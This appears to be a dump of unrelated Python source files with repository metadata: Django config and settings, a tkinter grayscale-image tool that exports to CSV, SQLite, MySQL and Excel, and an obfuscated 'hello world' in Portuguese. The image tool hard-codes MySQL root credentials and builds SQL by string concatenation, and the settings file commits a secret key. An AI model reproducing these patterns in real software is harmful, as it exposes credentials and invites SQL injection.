# rows join against the hotel table.  Direct .loc assignment replaces the
# original chained `df['col'].loc[idx] = ...`, which raises
# SettingWithCopyWarning and may silently fail to write through.
reviews.loc[reviews['hotel_name'] == "Hotel Indigo Atlanta – Vinings", 'hotel_name'] = "Hotel Indigo Atlanta - Vinings"
reviews.loc[reviews['hotel_name'] == 'DoubleTree by Hilton Hotel Atlanta North Druid Hills – Emory Area', 'hotel_name'] = 'DoubleTree by Hilton Hotel Atlanta North Druid Hills - Emory Area'
#%%
# Attach the hotel-level features to every review and persist the result.
final = reviews.merge(hotel, how ='left', on= 'hotel_name')
final.to_pickle('files/read_in.pkl')
#%%
#%%
| [
"paulbkim94@gmail.com"
] | paulbkim94@gmail.com |
e301cf4e8f6f25417f5f8ff02b0debeda97ab9a6 | a137dcee4da101a843d4a5d3b2054472d484f4ec | /eeslides/eeslides/urls.py | 8cb32ae0f32254d164426a8dc4d73f343861cb23 | [] | no_license | hanshanley/EEfaces-1 | 462aa0c38867030dd0c2bd19a2082b87d9d42690 | 9fc590e26ba474295120f486b14703aa95112d49 | refs/heads/master | 2020-12-30T22:35:37.733913 | 2016-11-10T06:02:12 | 2016-11-10T06:02:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 974 | py | """eeslides URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf import settings
from django.conf.urls import include, url
from django.conf.urls.static import static
from django.contrib import admin
urlpatterns = [
    url(r'^admin/', admin.site.urls),        # Django admin site
    url(r'', include('eeslides_app.urls')),  # everything else -> the app
]
# Serve static assets from Django itself (development convenience).
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
"skwang@princeton.edu"
] | skwang@princeton.edu |
408be7c9835520057e0fd69759857a3e3bc02f1d | b0b87924d07101e25fa56754ceaa2f22edc10208 | /workspace/python_study/Woojae_nam/Wu/Day11-05.py | e07fe32103a8b2b11607f10373a2d4d795669ccd | [] | no_license | SoheeKwak/Python | 2295dd03e5f235315d07355cbe72998f8b86c147 | e1a5f0ecf31e926f2320c5df0e3416306b8ce316 | refs/heads/master | 2020-04-02T13:49:58.367361 | 2018-11-23T09:33:23 | 2018-11-23T09:33:23 | 154,499,204 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 20,792 | py | ## 영상 처리 및 데이터 분석 툴
from tkinter import *; import os.path ;import math
from tkinter.filedialog import *
from tkinter.simpledialog import *
## 함수 선언부
def loadImage(fname) :
    """Load a square 8-bit grayscale RAW file into the global inImage buffer."""
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    fsize = os.path.getsize(fname) # file size in bytes
    inH = inW = int(math.sqrt(fsize)) # RAW is assumed square: side = sqrt(size) (important!)
    inImage = []; tmpList = []
    for i in range(inH) : # allocate the input buffer (initialised to 0)
        tmpList = []
        for k in range(inW) :
            tmpList.append(0)
        inImage.append(tmpList)
    # load the file contents into memory, one byte per pixel
    fp = open(fname, 'rb') # open the file in binary mode
    for i in range(inH) :
        for k in range(inW) :
            inImage[i][k] = int(ord(fp.read(1)))
    fp.close()
def openFile() :
    """Ask the user for a RAW file, load it and display it unmodified."""
    global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
    filename = askopenfilename(parent=window,
                filetypes=(("RAW파일", "*.raw"), ("모든파일", "*.*")))
    loadImage(filename) # file --> input buffer
    equal() # input buffer --> output buffer (and refresh the display)
import threading
def display() :
    """Render the global outImage buffer onto the Tk canvas.

    Large images are subsampled so the view never exceeds 128x128; the
    pixels are pushed from a background thread so the UI stays responsive.
    """
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    # tear down any previously shown canvas first
    if canvas != None :
        canvas.destroy()
    # prepare the (fixed-size) view
    VIEW_X, VIEW_Y = 128, 128
    if VIEW_X >= outW or VIEW_Y >= outH : # image smaller than 128: show it 1:1
        VIEW_X = outW
        VIEW_Y = outH
        step =1 # subsampling stride
    else :
        step = int(outW / VIEW_X)
    window.geometry(str(VIEW_X*2) + 'x' + str(VIEW_Y*2))
    canvas = Canvas(window, width=VIEW_X, height=VIEW_Y)
    paper = PhotoImage(width=VIEW_X, height=VIEW_Y)
    canvas.create_image((VIEW_X/2, VIEW_Y/2), image=paper, state='normal')
    # paint the pixels (grayscale: same value for R, G and B)
    def putPixel() :
        for i in range(0, outH, step) :
            for k in range(0, outW, step) :
                data = outImage[i][k]
                paper.put('#%02x%02x%02x' % (data, data, data), (int(k/step),int(i/step)))
    threading.Thread(target=putPixel).start()
    canvas.pack(expand=1, anchor=CENTER)
    status.configure(text='이미지 정보:' + str(outW) + 'x' + str(outH))
def equal() : # identity transform
    """Copy the input buffer to the output buffer unchanged, then display."""
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    # The output buffer matches the input dimensions exactly.
    outW = inW
    outH = inH
    # Row-by-row copy of every pixel.
    outImage = [[inImage[i][k] for k in range(inW)] for i in range(inH)]
    display()
def addImage() : # brighten
    """Add a user-chosen constant to every pixel, saturating at 255."""
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    # The output buffer matches the input dimensions exactly.
    outW = inW
    outH = inH
    value = askinteger('밝게하기', '밝게할 값-->', minvalue=1, maxvalue=255)
    # Add the offset, clamping at pure white (255).
    outImage = [[min(inImage[i][k] + value, 255) for k in range(inW)]
                for i in range(inH)]
    display()
def a_average() : # mean gray level of the input and output images
    """Show the average pixel value of both buffers in a small pop-up."""
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    rawSum = 0
    for i in range(inH) :
        for k in range(inW) :
            rawSum += inImage[i][k]
    inRawAvg = int(rawSum / (inH*inW))
    rawSum = 0
    for i in range(outH) :
        for k in range(outW) :
            rawSum += outImage[i][k]
    outRawAvg = int(rawSum / (outH*outW))
    subWindow = Toplevel(window) # sub-window owned by the parent (window)
    subWindow.geometry('200x100')
    label1 = Label(subWindow, text='입력영상 평균값 -->' + str(inRawAvg) ); label1.pack()
    label2 = Label(subWindow, text='출력영상 평균값 -->' + str(outRawAvg)); label2.pack()
    subWindow.mainloop()
def upDown() : # vertical flip
    """Flip the input image top-to-bottom into the output buffer."""
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    # The output buffer matches the input dimensions exactly.
    outW = inW; outH = inH;
    outImage = []; tmpList = []
    for i in range(outH): # allocate the output buffer (initialised to 0)
        tmpList = []
        for k in range(outW):
            tmpList.append(0)
        outImage.append(tmpList)
    # Mirror the rows: input row i lands on output row (outH-1-i).
    # The original indexed with outW here, which only worked because the
    # images happen to be square; outH is the correct row bound.
    for i in range(inH) :
        for k in range(inW) :
            outImage[outH-1-i][k] = inImage[i][k]
    display()
def panImage() :
    """Arm panning: the next click-drag on the window moves the image."""
    global panYN
    panYN = True
def mouseClick(event) :
    """Record the drag start point (only while panning is armed)."""
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    global sx, sy, ex, ey, panYN
    if not panYN :
        return
    sx = event.x; sy = event.y;
def mouseDrop(event):
    """Finish the drag: shift the input image by the drag vector."""
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    global sx, sy, ex, ey, panYN
    if not panYN:
        return
    ex = event.x; ey = event.y;
    # drag vector: event x/y are column/row, image indices are [row][col]
    my = sx - ex ; mx = sy - ey
    # the output buffer matches the input dimensions exactly
    outW = inW; outH = inH;
    outImage = []; tmpList = []
    for i in range(outH): # allocate the output buffer (initialised to 0)
        tmpList = []
        for k in range(outW):
            tmpList.append(0)
        outImage.append(tmpList)
    # copy each pixel to its shifted position; pixels shifted off the edge
    # are dropped and uncovered areas stay black (0)
    for i in range(inH) :
        for k in range(inW) :
            if 0<= i-mx <outH and 0<= k-my < outW :
                outImage[i-mx][k-my] = inImage[i][k]
    panYN = False
    display()
def zoomOut() : # shrink by an integer factor
    """Shrink the image by a user-chosen factor using plain subsampling."""
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    scale = askinteger('축소하기', '축소할 배수-->', minvalue=2, maxvalue=32)
    # The output buffer is 1/scale the size of the input.
    outW = int(inW/scale); outH = int(inH/scale)
    outImage = [[0 for _ in range(outW)] for _ in range(outH)]
    # Each output cell ends up holding the last input pixel that maps onto
    # it (subsampling, no averaging).
    for i in range(inH) :
        for k in range(inW) :
            outImage[i//scale][k//scale] = inImage[i][k]
    display()
import struct
def saveFile() :
    """Write the output buffer to disk as a raw 8-bit grayscale file."""
    global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
    saveFp = asksaveasfile(parent=window, mode='wb',
        defaultextension="*.raw", filetypes=(("RAW파일", "*.raw"), ("모든파일", "*.*")))
    for i in range(outW):
        for k in range(outH):
            saveFp.write( struct.pack('B',outImage[i][k])) # one unsigned byte per pixel
    saveFp.close()
def exitFile() :
    # TODO: not implemented yet — the menu entry exists but does nothing
    global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
    pass
import csv
def saveCSV() :
    """Export the output buffer as a (Column, Row, Value) CSV file."""
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    output_file = asksaveasfile(parent=window, mode='w',
        defaultextension="*.csv", filetypes=(("CSV파일", "*.csv"), ("모든파일", "*.*")))
    output_file = output_file.name # keep only the path; reopened below
    header = ['Column', 'Row', 'Value']
    with open(output_file, 'w', newline='') as filewriter:
        csvWriter = csv.writer(filewriter)
        csvWriter.writerow(header)
        for row in range(outW):
            for col in range(outH):
                data = outImage[row][col]
                row_list = [row, col, data] # one CSV row per pixel
                csvWriter.writerow(row_list)
    print('OK!')
def saveShuffleCSV() :
    # TODO: not implemented yet — the menu entry exists but does nothing
    pass
def loadCSV(fname) :
    """Load a (row, col, value) CSV export into the global inImage buffer."""
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    fsize = -1 # start at -1 so the header line is not counted
    fp = open(fname, 'r')
    for f in fp :
        fsize += 1
    fp.close()
    inH = inW = int(math.sqrt(fsize)) # one CSV row per pixel; image assumed square (important!)
    inImage = []; tmpList = []
    for i in range(inH) : # allocate the input buffer (initialised to 0)
        tmpList = []
        for k in range(inW) :
            tmpList.append(0)
        inImage.append(tmpList)
    # load the CSV rows into memory
    fp = open(fname, 'r') # open the file in text mode
    csvFP = csv.reader(fp)
    next(csvFP) # skip the header line
    for row_list in csvFP :
        row= int(row_list[0]) ; col = int(row_list[1]) ; value=int(row_list[2])
        inImage[row][col] = value
    fp.close()
def openCSV() :
    """Ask the user for a CSV export, load it and display it unmodified."""
    global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
    filename = askopenfilename(parent=window,
                filetypes=(("CSV파일", "*.csv"), ("모든파일", "*.*")))
    loadCSV(filename) # file --> input buffer
    equal() # input buffer --> output buffer (and refresh the display)
import sqlite3
def saveSQLite() :
    """Export the output buffer into the local SQLite database 'imageDB'."""
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    global csvList, input_file
    con = sqlite3.connect('imageDB') # open (or create) the database
    cur = con.cursor() # cursor used to issue the queries
    fname = os.path.basename(filename).split(".")[0] # key rows by base file name
    try:
        sql = "CREATE TABLE imageTable( filename CHAR(20), resolution smallint" + \
              ", row smallint, col smallint, value smallint)"
        cur.execute(sql)
    except:
        pass # table already exists
    try:
        # Remove any previous export of this image at this resolution so
        # repeated saves do not pile up duplicates (mirrors saveMySQL).
        sql = "DELETE FROM imageTable WHERE filename='" + \
              fname + "' AND resolution=" + str(outW)
        cur.execute(sql)
        con.commit()
    except:
        pass
    # The original exported the *input* buffer here; write the processed
    # output instead, consistent with saveMySQL and the other exporters.
    for i in range(outW) :
        for k in range(outH) :
            sql = "INSERT INTO imageTable VALUES('" + fname + "'," + str(outW) + \
                  "," + str(i) + "," + str(k) + "," + str(outImage[i][k]) +")"
            cur.execute(sql)
    con.commit()
    cur.close()
    con.close() # close the database connection
    print('Ok!')
def openSQLite() :
    """List the images stored in SQLite and load the one the user picks."""
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    global csvList, input_file
    con = sqlite3.connect('imageDB') # open (or create) the database
    cur = con.cursor() # cursor used to issue the queries
    try :
        sql = "SELECT DISTINCT filename, resolution FROM imageTable"
        cur.execute(sql)
        tableNameList = [] # entries look like 'name:resolution'
        while True :
            row = cur.fetchone()
            if row == None :
                break
            tableNameList.append( row[0] + ':' + str(row[1]) )
        ######## inner (local) function: callback for the pick-list ########
        def selectTable() :
            global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
            selectedIndex = listbox.curselection()[0]
            subWindow.destroy()
            fname, res = tableNameList[selectedIndex].split(':')
            filename = fname
            sql = "SELECT row, col, value FROM imageTable WHERE filename='" + \
                  fname + "' AND resolution=" + res
            print(sql)
            cur.execute(sql)
            inH = inW = int(res)
            inImage = []; tmpList = []
            for i in range(inH): # allocate the input buffer (initialised to 0)
                tmpList = []
                for k in range(inW):
                    tmpList.append(0)
                inImage.append(tmpList)
            while True :
                row_tuple = cur.fetchone()
                if row_tuple == None :
                    break
                row, col, value = row_tuple
                inImage[row][col] = value
            cur.close()
            con.close()
            equal() # input buffer --> output buffer (and refresh the display)
            print("Ok! openSQLite")
        ################################################################
        subWindow = Toplevel(window)
        listbox = Listbox(subWindow)
        button = Button(subWindow, text='선택', command=selectTable)
        listbox.pack(); button.pack()
        for sName in tableNameList :
            listbox.insert(END, sName)
        subWindow.lift()
    except :
        cur.close()
        con.close()
        print("Error! openSQLite")
import pymysql
def saveMySQL() :
    """Export the output buffer into the remote MySQL database 'imageDB'."""
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    global csvList, input_file
    # NOTE(review): credentials are hard-coded and the SQL below is built by
    # string concatenation — acceptable for a lab tool, not for production.
    con = pymysql.connect(host='192.168.174.129', user='root',
                          password='1234', db='imageDB', charset='utf8') # connect to the database
    cur = con.cursor() # cursor used to issue the queries
    # key rows by the base file name (without extension)
    colList = []
    fname = os.path.basename(filename).split(".")[0]
    try:
        sql = "CREATE TABLE imageTable( filename CHAR(20), resolution smallint" + \
              ", row smallint, col smallint, value smallint)"
        cur.execute(sql)
    except:
        pass # table already exists
    try:
        # remove any previous export of this image at this resolution
        sql = "DELETE FROM imageTable WHERE filename='" + \
              fname + "' AND resolution=" + str(outW)
        cur.execute(sql)
        con.commit()
    except:
        pass
    for i in range(inW) :
        for k in range(inH) :
            sql = "INSERT INTO imageTable VALUES('" + fname + "'," + str(outW) + \
                  "," + str(i) + "," + str(k) + "," + str(outImage[i][k]) +")"
            cur.execute(sql)
    con.commit()
    cur.close()
    con.close() # close the database connection
    print('Ok! saveMySQL')
def openMySQL() :
    """List the images stored in MySQL and load the one the user picks."""
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    global csvList, input_file
    con = pymysql.connect(host='192.168.174.129', user='root',
                          password='1234', db='imageDB', charset='utf8') # connect to the database
    cur = con.cursor() # cursor used to issue the queries
    try :
        sql = "SELECT DISTINCT filename, resolution FROM imageTable"
        cur.execute(sql)
        tableNameList = [] # entries look like 'name:resolution'
        while True :
            row = cur.fetchone()
            if row == None :
                break
            tableNameList.append( row[0] + ':' + str(row[1]) )
        ######## inner (local) function: callback for the pick-list ########
        def selectTable() :
            global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
            selectedIndex = listbox.curselection()[0]
            subWindow.destroy()
            fname, res = tableNameList[selectedIndex].split(':')
            filename = fname
            sql = "SELECT row, col, value FROM imageTable WHERE filename='" + \
                  fname + "' AND resolution=" + res
            print(sql)
            cur.execute(sql)
            inH = inW = int(res)
            inImage = []; tmpList = []
            for i in range(inH): # allocate the input buffer (initialised to 0)
                tmpList = []
                for k in range(inW):
                    tmpList.append(0)
                inImage.append(tmpList)
            while True :
                row_tuple = cur.fetchone()
                if row_tuple == None :
                    break
                row, col, value = row_tuple
                inImage[row][col] = value
            cur.close()
            con.close()
            equal() # input buffer --> output buffer (and refresh the display)
            print("Ok! openMySQL")
        ################################################################
        subWindow = Toplevel(window)
        listbox = Listbox(subWindow)
        button = Button(subWindow, text='선택', command=selectTable)
        listbox.pack(); button.pack()
        for sName in tableNameList :
            listbox.insert(END, sName)
        subWindow.lift()
    except :
        cur.close()
        con.close()
        print("Error! openMySQL")
import xlwt
def saveExcel1() :
    """Export the output buffer to an .xls sheet, one numeric cell per pixel."""
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    output_file = asksaveasfile(parent=window, mode='w',
        defaultextension="*.xls", filetypes=(("XLS파일", "*.xls"), ("모든파일", "*.*")))
    output_file = output_file.name # keep only the path; xlwt writes the file itself
    sheetName = os.path.basename(output_file).split(".")[0] # sheet named after the file
    wb = xlwt.Workbook()
    ws = wb.add_sheet(sheetName)
    for rowNum in range(outH):
        for colNum in range(outW):
            data = outImage[rowNum][colNum]
            ws.write(rowNum, colNum, data)
    wb.save(output_file)
    print('OK! saveExcel1')
import xlsxwriter
def saveExcel2() :
    """Export the output buffer to .xlsx, shading each cell with its gray level."""
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    output_file = asksaveasfile(parent=window, mode='w',
        defaultextension="*.xlsx", filetypes=(("XLSX파일", "*.xls"), ("모든파일", "*.*")))
    output_file = output_file.name # keep only the path; xlsxwriter writes the file itself
    sheetName = os.path.basename(output_file).split(".")[0] # sheet named after the file
    wb = xlsxwriter.Workbook(output_file)
    ws = wb.add_worksheet(sheetName)
    ws.set_column(0, outW, 1.0) # narrow columns (~0.34) to get near-square cells
    for r in range(outH):
        ws.set_row(r, 9.5) # short rows (~0.35) to match
    for rowNum in range(outW) :
        for colNum in range(outH) :
            data = outImage[rowNum][colNum]
            # shade the cell background with the gray value: #000000-#FFFFFF
            if data > 15 :
                hexStr = '#' + (hex(data)[2:])*3
            else :
                hexStr = '#' + ('0' + hex(data)[2:]) * 3 # zero-pad single hex digits
            # prepare a cell format carrying that background colour
            cell_format = wb.add_format()
            cell_format.set_bg_color(hexStr)
            ws.write(rowNum, colNum, '', cell_format)
    wb.close()
    print('OK! saveExcel2')
## Global state shared by every handler above
window, canvas, paper, filename = [None] * 4
inImage, outImage = [], []; inW, inH, outW, outH = [0] * 4 # image buffers and their sizes
panYN = False; sx, sy, ex, ey = [0] * 4 # panning flag and drag coordinates
VIEW_X, VIEW_Y = 128, 128 # treated as constants (hence upper case)
status = None
## Main code: build the window, status bar and menus
window = Tk(); window.geometry('400x400')
window.title('영상 처리&데이터 분석 Ver 0.7')
window.bind("<Button-1>", mouseClick)
window.bind("<ButtonRelease-1>", mouseDrop)
status = Label(window, text='이미지 정보', bd=1, relief=SUNKEN, anchor=W)
status.pack(side=BOTTOM, fill=X)
mainMenu = Menu(window);window.config(menu=mainMenu)
# File menu: open/save RAW files, exit
fileMenu = Menu(mainMenu);mainMenu.add_cascade(label='파일', menu=fileMenu)
fileMenu.add_command(label='열기', command=openFile)
fileMenu.add_command(label='저장', command=saveFile)
fileMenu.add_separator()
fileMenu.add_command(label='종료', command=exitFile)
# Per-pixel operations
pixelMenu = Menu(mainMenu);mainMenu.add_cascade(label='화소점처리', menu=pixelMenu)
pixelMenu.add_command(label='동일영상', command=equal)
pixelMenu.add_command(label='밝게하기', command=addImage)
# Geometric operations
geoMenu = Menu(mainMenu);mainMenu.add_cascade(label='기하학 처리', menu=geoMenu)
geoMenu.add_command(label='상하반전', command=upDown)
geoMenu.add_command(label='화면이동', command=panImage)
geoMenu.add_command(label='화면축소', command=zoomOut)
# Simple statistics
analyzeMenu = Menu(mainMenu);mainMenu.add_cascade(label='데이터분석', menu=analyzeMenu)
analyzeMenu.add_command(label='평균값', command=a_average)
# Import/export to other storage formats (CSV, SQLite, MySQL, Excel)
otherMenu = Menu(mainMenu);mainMenu.add_cascade(label='다른 포맷 처리', menu=otherMenu)
otherMenu.add_command(label='CSV로 내보내기', command=saveCSV)
otherMenu.add_command(label='CSV(셔플)로 내보내기', command=saveShuffleCSV)
otherMenu.add_command(label='CSV 불러오기', command=openCSV)
otherMenu.add_separator()
otherMenu.add_command(label='SQLite로 내보내기', command=saveSQLite)
otherMenu.add_command(label='SQLite에서 가져오기', command=openSQLite)
otherMenu.add_separator()
otherMenu.add_command(label='MySQL로 내보내기', command=saveMySQL)
otherMenu.add_command(label='MySQL에서 가져오기', command=openMySQL)
otherMenu.add_separator()
otherMenu.add_command(label='Excel로 내보내기(숫자)', command=saveExcel1)
otherMenu.add_command(label='Excel로 내보내기(음영)', command=saveExcel2)
window.mainloop()
"soheekwak728@gmail.com"
] | soheekwak728@gmail.com |
099196cd89f175bdc7000e05ef33906e5e9a8486 | d25ca532b31d5c9a8cd9428ed3c03e1ab03c8cad | /spotting/auth_password/forms.py | 09887d7e3c4c136b19f5920fbbec3fa402c74b1a | [] | no_license | rrees/car-spotting | 691c639b2bfaefbe501a7cb5b37e1e0798c74cbb | cd1e631cc66bb722d66fb60e7d958caadd6ca695 | refs/heads/main | 2023-06-10T09:19:43.027613 | 2023-06-03T23:08:46 | 2023-06-03T23:08:46 | 68,435,512 | 0 | 0 | null | 2023-02-28T14:58:54 | 2016-09-17T06:16:29 | Python | UTF-8 | Python | false | false | 234 | py | from wtforms import Form, validators
from wtforms import fields
class Login(Form):
    """Login form: an e-mail/username field plus a password, both required."""
    # NOTE(review): the field is named `email` but labelled 'Username' —
    # confirm which the templates and the login handler actually expect.
    email = fields.StringField('Username', [validators.InputRequired()])
    password = fields.PasswordField('Password', [validators.InputRequired()])
"shudderfix@gmail.com"
] | shudderfix@gmail.com |
f86fedfffdcf4b2395c4834a4aa4f57b439f93fa | f57ca2d090539c3d223be4f0dbcfb423c03712f7 | /mysite/settings.py | fe93a82f7b9a519a79b917f4b29d624428d4dbe4 | [] | no_license | saikiran1201/my-portfolio-site-django | 54dc41524f0cbe1a86b054530f2c32c6e62caa7e | 897b9a8d26b8f3393c94eee6c9e9ec377cbed400 | refs/heads/main | 2023-07-27T05:59:13.763150 | 2021-09-14T13:52:45 | 2021-09-14T13:52:45 | 315,571,961 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,169 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 3.1.3.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
import os
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to source control — rotate it and read
# it from the environment (e.g. os.environ) before any production deploy.
SECRET_KEY = 'rvwepwu=de1x_o6c8c1+j9&ve3$x$bq&yes)=o3ny(6jkv@hr4'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

# Empty is fine for local development; list real host names for production.
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'base',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
MEDIA_URL = '/images/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'static')
] | [
"74893035+saikiran1201@users.noreply.github.com"
] | 74893035+saikiran1201@users.noreply.github.com |
83f32c93a09d9517531e3c808330455c03106856 | 6adf4ac34a169fe64933e33f3a70d11bb9d13968 | /FPLPredictions/senior-project/wsgi.py | 9125bbf4cc1f2381740254e2bd1422b81dae9911 | [] | no_license | PrestonMcIllece/portfolio | 6771fdbeb41a40f913c8965bbb83edec7eea21dd | f93f9b85d4fe39f866a3a8a87a3dd1ba5adc170f | refs/heads/master | 2021-06-21T17:07:18.628152 | 2021-06-10T21:48:29 | 2021-06-10T21:48:29 | 227,684,262 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 405 | py | """
WSGI config for senior-project project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Point Django at this project's settings module before building the app.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'senior-project.settings')
# Module-level WSGI callable picked up by the application server.
application = get_wsgi_application()
| [
"mcillece.p@gmail.com"
] | mcillece.p@gmail.com |
19f81da776ea9846783e00f44294459f4042db95 | fea3468b2f6b636949160dbf692f6ce5d72b5c4b | /scripts/load_currencies.py | d05ee2a9f107df9a06d9d0e7b40224f617a6f896 | [
"MIT"
] | permissive | marcelor/xchange | 6031e288f168fcf6f8cb68c35032cebcf6070d1e | 1d1e1f615b088a5dd129a5122540fc0815e20eae | refs/heads/master | 2020-05-17T17:40:26.631115 | 2013-01-20T06:00:45 | 2013-01-20T06:00:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 201 | py | from main import Currency, db
from money import CURRENCY
for code, obj in CURRENCY.items():
currency = Currency(name=obj.name, iso_code=obj.code)
db.session.add(currency)
db.session.commit()
| [
"marcelor@gmail.com"
] | marcelor@gmail.com |
39abaaebe959475c5de589264f187fbb78f02716 | 6daa4d4bf1235f31e78f34b5478915a58a71ed8e | /Python/hello_world_pt-br.py | bfe3e794162bdee0a01756cb300dfeebc50bddda | [
"MIT"
] | permissive | thivatm/Hello-world | 21b13859593d897668adfe24bee1823ef83d9740 | d03d1e9737d9d2ffdb3e86d6da4b788ebeac3fb0 | refs/heads/master | 2020-04-03T14:52:30.463216 | 2018-10-30T07:24:48 | 2018-10-30T07:24:48 | 155,339,571 | 1 | 1 | MIT | 2018-10-30T08:45:59 | 2018-10-30T07:03:49 | Jupyter Notebook | UTF-8 | Python | false | false | 2,177 | py | #!/usr/bin/env python
"""hello_world_pt-br: overly complicated way of printing "Hello World" in pt-BR!
Based on this blog post:
https://benkurtovic.com/2014/06/01/obfuscating-hello-world.html
This program prints "Ola mundo!" which is the pt-BR equivalent of "Hello World".
Python3 compatibility.
"""
__author__ = "Victor Neves"
__license__ = "MIT"
__maintainer__ = "Victor Neves"
__email__ = "victorneves478@gmail.com"
(lambda _, __, ___, ____, _____, ______, _______, ________:
getattr(
__import__(True.__class__.__name__[_] + [].__class__.__name__[__]),
().__class__.__eq__.__class__.__name__[:__] +
().__iter__().__class__.__name__[_:][_____:________]
)(
_, (lambda _, __, ___: _(_, __, ___))(
lambda _, __, ___:
bytes([___ % __]) + _(_, __, ___ // __) if ___ else
(lambda: _).__code__.co_lnotab,
_ << ________,
(((_____ << ____) + _) << ((_____ << ____) - ___)) + (((___ << ___)
- _) << ((((_ << ____) + _) << __))) - (((_____ << ___) - _) <<
((_______ << ___) + (_ << _))) + (((_______ << ___) - _) << ((___ <<
____) + _)) + (((((_ << ____) - _) << __) - _) << ((_____ << ___) +
_)) - ((((((_ << ___) + _)) << ___) + _) << ((_ << _____) + _)) -
(_______ << ((_______ << __) + _)) + (((___ << ____) + _) << ((_ <<
____) + _)) - ((((((_ << ___) + _)) << __) + _) << ((_____ << _))) +
(_____ << ____) - _
)
)
)(
*(lambda _, __, ___: _(_, __, ___))(
(lambda _, __, ___:
[__(___[(lambda: _).__code__.co_nlocals])] +
_(_, __, ___[(lambda _: _).__code__.co_nlocals:]) if ___ else []
),
lambda _: _.__code__.co_argcount,
(
lambda _: _,
lambda _, __: _,
lambda _, __, ___: _,
lambda _, __, ___, ____: _,
lambda _, __, ___, ____, _____: _,
lambda _, __, ___, ____, _____, ______: _,
lambda _, __, ___, ____, _____, ______, _______: _,
lambda _, __, ___, ____, _____, ______, _______, ________: _
)
)
)
| [
"thivagartm@gmail.com"
] | thivagartm@gmail.com |
